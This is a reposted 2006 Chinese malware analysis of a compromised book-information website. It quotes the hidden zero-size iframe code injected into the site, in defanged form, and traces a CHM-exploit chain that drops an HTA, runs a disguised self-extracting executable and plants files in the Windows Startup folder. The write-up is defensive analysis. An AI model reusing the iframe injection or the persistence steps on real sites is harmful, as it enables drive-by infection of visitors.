某图书信息网被加入恶意代码

来源：互联网发布：mac版pscs3中文破解版编辑：程序博客网时间：2024/04/17 03:28

endurer 原创

2006-11-08 第1版

该图书信息网首页首部被加入代码：

＜iframe src=hxxp://www*.book***info**.com.cn/change.htm width=0 height=0 frameborder=0＞＜/iframe＞

change.htm 的内容为：
/--------
＜html＞
＜iframe src="hxxp://www*.book***info**.com.cn/ind/caohui.htm" width="0" height="0" frameborder="0"＞＜/iframe＞

＜iframe src="hxxp://hk.myblog.yahoo.com/f*4-stu**dent*" width="0" height="0" frameborder="0"＞＜/iframe＞

＜iframe src="hxxp://blog.q**oo*z*a.hk/tmcf4student/" width="0" height="0" frameborder="0"＞＜/iframe＞
＜/html＞
--------/

hxxp://www*.book***info**.com.cn/ind/caohui.htm 的内容为加入多余空格的利用CHM漏洞的恶意代码，会下载2个文件：

1、caohui.gif 为加入多余空格的脚本程序，文件长度为 117 KB (120,006 字节)，功能为:创建并运行c:/caohui.hta。
c:/caohui.hta的功能为：
1）从IE临时文件夹中寻找caohui.css，复制为C:/soft.exe并运行。
2）创建文件c:/wins.bat来删除自己。

caohui.css 其实是一个WinRAR制作的自解压文件，文件长度为 20,006 字节，解压脚本为：
/--------
包含; 下列註解包含自解檔指令碼命令

Path=C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/
SavePath
Silent=1
Overwrite=1
--------/

把文件解压到C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/ 下……

这对使用简体中文版的Windows用户不起作用罢？^_^！

包中的文件为 dnserror.htm，文件长度为 3,260 字节，其中包含代码：

/--------
＜iframe src="hxxp://home.tmcss.edu.hk/~t*m*c-02**016/change.htm" width="0" height="0" frameborder="0"＞＜/iframe＞
--------/